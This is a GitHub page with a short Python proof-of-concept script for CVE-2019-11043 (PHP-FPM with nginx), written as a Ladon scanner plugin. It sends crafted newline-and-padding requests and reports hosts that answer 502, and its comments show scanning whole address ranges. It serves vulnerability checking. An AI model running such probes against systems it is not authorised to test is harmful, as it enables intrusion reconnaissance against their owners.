-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathCVE-2019-11043-POC.py
45 lines (38 loc) · 1.21 KB
/
CVE-2019-11043-POC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
import sys
# Ladon POC by k8gege
# VUL: CVE-2019-11043 (PHP-FPM + Ngnix)
# url need include .php Example:http://192.168.1.37:8080/index.php
# CVE-2019-11043_POC.ini
# [Ladon]
# exe=F:\Python279\python.exe
# arg=POC\CVE-2019-11043-POC.py $ip$
# Example
# Ladon 192.168.1.37/24 poc/CVE-2019-11043_Poc.ini
# Ladon http://192.168.1.37:8080/index.php poc/CVE-2019-11043_Poc.ini
# Result
# Ladon 5.5
# Call AnyExe/Command
# http://192.168.1.37:8080/index.php
# load F:\Python279\python.exe
# ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php
def checkpoc(url):
try:
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0"}
res1 = requests.get(url, headers=headers)
if res1.status_code == 200:
print "URL: "+url
for i in range(1499, 1900):
res = requests.get(url + "/PHP%0Ais_poc_thistiest_lang.php?" + "K" * i, headers=headers)
if res.status_code == 502:
print("ISVUL: CVE-2019-11043 "+url)
break
except:
pass
url = sys.argv[1]
if "http" in url:
checkpoc(url)
else:
checkpoc("http://"+url+"/index.php")
checkpoc("http://"+url+":8080/index.php")
checkpoc("https://"+url+"/index.php")